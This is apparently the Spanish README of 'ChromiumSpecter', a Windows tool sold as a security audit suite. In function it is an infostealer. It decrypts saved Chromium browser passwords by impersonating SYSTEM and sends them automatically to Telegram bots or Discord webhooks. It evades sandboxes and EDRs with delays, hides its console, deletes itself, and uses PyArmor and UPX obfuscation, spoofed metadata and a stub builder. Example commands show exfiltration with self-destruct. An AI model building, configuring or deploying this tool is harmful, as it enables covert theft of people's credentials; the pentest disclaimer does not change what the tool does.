Note
English Version | Versión en Español
La suite definitiva de grado táctico para auditorías de seguridad en navegadores Chromium (Chrome, Edge, Brave, Vivaldi, Opera, Opera GX).
ChromiumSpecter implementa un motor de descifrado directo mediante impersonación de SYSTEM. A diferencia de otras herramientas tácticas del sector como Chrome-App-Bound-Encryption-Decryption (C++), que dependen de la inyección de código ruidoso en memoria, nuestra arquitectura prioriza la estabilidad operativa y el sigilo defensivo.
| Característica | Impersonación CNG + SYSTEM (ChromiumSpecter) | Enfoque COM + Inyección (C++ - Chrome-App-Bound-Encryption-Decryption) |
|---|---|---|
| Requisito de Privilegios | Requiere privilegios de Administrador (para impersonar winlogon y habilitar SeDebugPrivilege). |
VENTAJA: No requiere privilegios elevados (corre bajo el usuario estándar). |
| Firma de Evasión (AV / EDR) | VENTAJA: Extremely silent. No inyecta código, no crea procesos suspendidos, no altera la memoria de otros procesos. Utiliza únicamente APIs legítimas de Windows (ncrypt.dll). |
CRÍTICO: Ruidoso. La inyección DLL, el Process Hollowing y el uso de Direct Syscalls son altamente monitoreados y bloqueados por EDRs modernos. |
| Resistencia a Actualizaciones | VENTAJA: Altamente resistente. Mientras el navegador registre la clave en el KSP de Windows con el mismo nombre, el descifrado funciona independientemente de cambios en la interfaz COM. | DESVENTAJA: Frágil. Cambios en las interfaces internas de los navegadores (como la transición a IElevator2 en Chrome 144) inutilizan las stubs de C++ y exigen reescritura. |
| Complejidad del Código | VENTAJA: Baja complejidad. Lógica pura de interacción con la API de Windows mediante ctypes de Python. |
DESVENTAJA: Altísima complejidad. Requiere cargadores PE en memoria, manejo de offsets de VTable y stubs de interfaces COM para cada navegador. |
ChromiumSpecter es una suite de auditoría de credenciales diseñada para entornos Windows, enfocada en la discreción, la automatización y la ergonomía operativa. Permite extraer, descifrar y exfiltrar datos de navegadores basados en Chromium (v80+) con una arquitectura modular y resiliente.
- 🖥️ Dashboard de Alta Densidad: Interfaz gráfica profesional con consolas en tiempo real, estadísticas dinámicas y gestión de resultados.
- 🔐 Next-Gen Decryption Engine (v20 Support)
v2.6.0:- Soporte nativo total para Chrome v127+, Edge v127+ y Brave v130+ (App-Bound Encryption) mediante el módulo
v20_decryptor. - Descifrado híbrido: Soporta AES-GCM (v10/v11), DPAPI Legacy y el nuevo esquema v20 de forma simultánea en la misma base de datos.
- Soporte Brave Direct Key: Mapeo automático de payloads de 32 bytes directos sin flags complejos.
- Sincronización Inteligente: El motor ahora utiliza importaciones dinámicas para sobrevivir a ofuscadores y garantizar portabilidad.
- Escalada de Privilegios: Implementa impersonación nativa de SYSTEM (vía
winlogon.exe) para extraer llaves protegidas por el sistema. (Requiere ejecutar como Administrador). - Detección inteligente: El motor identifica el prefijo (
v10,v11,v20) y aplica el algoritmo correspondiente con fallback automático.
- Soporte nativo total para Chrome v127+, Edge v127+ y Brave v130+ (App-Bound Encryption) mediante el módulo
- 🕵️ Motor de Sigilo (Tactical Stealth):
- Startup Delay: Selector de retraso inicial (0-300s) para evadir análisis en Sandboxes.
- Inter-file Delay (
send_delay): Pausas personalizables entre envíos para prevenir picos de tráfico que alerten a firewalls o EDRs. - Anti-Forensics: Soporte para Autodestrucción Táctica (Auto-Delete) del binario tras la ejecución.
- Protocolo de Pánico: Saneamiento total del entorno de auditoría con un solo clic.
- 🧠 Detección Inteligente de Perfiles:
- Escaneo diferenciado y visualización premium integrada (badges de colores de marca para Chrome, Edge, Brave, Vivaldi, Opera y Opera GX).
- Validación de tamaño de archivo antes de procesar (evita falsos positivos con BD vacías).
- Manejo de
PermissionErrorpor perfil sin abortar el escaneo completo.
- Auto-Exfiltración: Configuración para envío automático inmediato tras la auditoría.
- Multi-Canal: Soporte nativo para Telegram Bots y Discord Webhooks con redundancia.
- Persistencia Local: Guardado seguro de configuraciones de exfiltración para uso recurrente.
Generación de stubs personalizados con Inyección Dinámica de parámetros.
Universal Dependency Injection: El builder ahora parsea automáticamente requirements.txt y resuelve dependencias en tiempo de compilación.
Spoofing de Metadatos: Presets integrados para clonar firmas.
Compresión y Ofuscación: Soporte nativo para UPX y PyArmor.
- Configuración: Define tus tokens de Telegram/Discord en el Tab de Exfiltración y guárdalos.
- Auditoría: Lanza el escaneo desde el Dashboard. Puedes activar la Auto-exfiltración y Autodestrucción para un ciclo de "ejecución y olvido".
- Inspección: Visualiza las credenciales descifradas en tiempo real en el Tab de Resultados.
- Despliegue: Usa el Builder para generar un
.execon tus credenciales embebidas (Base64) y presets de sigilo configurados.
El motor principal (main.py) puede ejecutarse de forma independiente sin la interfaz gráfica, ideal para automatizaciones o despliegues rápidos via terminal.
Important
REQUERIMIENTO DE PRIVILEGIOS: Para descifrar perfiles de Chrome, Edge y Brave v127+ (V20), es OBLIGATORIO ejecutar la terminal (o el .exe) con privilegios de Administrador. Sin estos privilegios, el motor no podrá realizar la impersonación de SYSTEM necesaria para acceder al almacén de llaves CNG.
# Auditoría básica
python main.py
# Auditoría con exfiltración automática a Discord
python main.py --webhook "https://discord.com/api/webhooks/..." --self-destruct
# Auditoría silenciosa (sin consola) y guardado en carpeta personalizada
python main.py --stealth --output-dir "C:\temp\logs"| Grupo | Parámetro | Descripción |
|---|---|---|
| Exfiltración | --webhook |
Discord Webhook URL para envío de reportes. |
--tg-token |
Token del bot de Telegram. | |
--tg-chat-id |
ID del chat o canal de Telegram. | |
--no-exfil |
Desactiva el envío externo de datos. | |
| Reportes | --no-html |
No genera el reporte visual en HTML. |
--no-csv |
No genera el reporte estructurado en CSV. | |
--json |
Genera un reporte adicional en formato JSON. | |
--output-dir |
Carpeta de salida (default: .audit). |
|
| Motor | --browser |
Filtra por un navegador específico (chrome, brave, etc). |
--delay |
Retraso inicial (segundos) antes de actuar. | |
--stealth |
Modo Stealth: Oculta la ventana de consola inmediatamente al arrancar (vía API de Windows). | |
--auto-kill |
Cierra navegadores automáticamente si la base de datos está bloqueada. | |
--self-destruct |
Elimina el ejecutable tras finalizar el ciclo. | |
--no-wipe |
No borra los reportes locales tras enviarlos. | |
--clean |
Limpia todos los reportes antiguos en la carpeta de salida. | |
--debug |
Muestra logs detallados de depuración. |
Al usar el Builder, puedes inyectar los siguientes comportamientos en tu binario final. Las opciones marcadas con 📡 solo están disponibles cuando el archivo fuente es main.py o una copia del mismo.
| Parámetro | Rango / Opción | Propósito |
|---|---|---|
| Delay Inicial | 0s - 3600s | Retraso antes de la primera acción (Anti-Sandbox). |
| Send Delay | 0s - 60s | Pausa entre archivos enviados (Evasion de tráfico). |
| Webhook Timeout | 1s - 300s | Tiempo de espera para conexiones inestables. |
| 📡 Auto-Exfiltrar | Checkbox | Activa el envío automático sin intervención al ejecutar. |
| 📡 Modo Stealth | Runtime Flag | Oculta la consola al arrancar (vía ShowWindow Win32 API). |
| 💥 Autodestrucción | Checkbox | Elimina el .exe tras finalizar el ciclo. |
| UAC Prompt | Toggle | Solicita privilegios de administrador si es necesario. |
| Ofuscar con PyArmor | Toggle | Aplica ofuscación al código fuente antes de compilar. |
| Compresión UPX | Toggle | Comprime el binario final (reduce tamaño ~30-50%). |
| Mostrar Consola | Compiler Flag | Genera un Console App. Si está desmarcado, genera un Windowed App invisible. |
Tip
Diferencia Técnica — Mostrar Consola vs Modo Stealth:
- Mostrar Consola (Compilador): Determina si el Sistema Operativo crea la ventana desde cero. Desmarcado =
Windowed App, nunca hay ventana negra. - Modo Stealth (Runtime): La ventana sí se crea, pero el código la oculta en milisegundos con
ShowWindow(0). Puede verse un destello breve. - Recomendación: Dejá "Mostrar Consola" desmarcado + "Modo Stealth" marcado para doble capa de sigilo.
| Componente | Tecnología |
|---|---|
| Core UI | CustomTkinter (Modern Dark Theme) |
| Criptografía | v20 (App-Bound), AES-GCM 256 via PyCryptodomex + Windows DPAPI + SYSTEM Token Impersonation |
| Seguridad OS | Win32 API (CryptUnprotectData, ShowWindow, DuplicateTokenEx, ImpersonateLoggedOnUser) |
| Compilación | PyInstaller + PyArmor + UPX |
| Persistencia | JSON Local (.audit/exfil_config.json) |
| Testing | pytest + pytest-mock (22 tests, 0 fallos) |
# 1. Clonar el repositorio
git clone https://github.com/ANONIMO432HZ/ChromiumSpecter
cd ChromiumSpecter
# 2. Instalar dependencias
pip install -r requirements.txt
# 3. Lanzar el Dashboard
python gui_app.pyLa suite incluye una batería de pruebas automatizadas para garantizar la integridad de los algoritmos de descifrado y los canales de exfiltración.
# Ejecutar todos los tests
pytest -vEste proyecto está bajo la licencia GNU General Public License v3.0 (GPLv3). Esto significa que puedes usar, modificar y distribuir el software, pero cualquier trabajo derivado debe ser también de código abierto bajo la misma licencia y debe dar crédito explícito al autor original (ANONIMO432HZ). Consulta el archivo LICENSE para más detalles.
Caution
ESTE SOFTWARE ES PARA FINES DE PENTESTING ÉTICO Y AUDITORÍA PROFESIONAL. El uso de esta herramienta para acceder a sistemas sin la autorización explícita del propietario es ilegal. El autor no asume responsabilidad por el mal uso de esta suite.


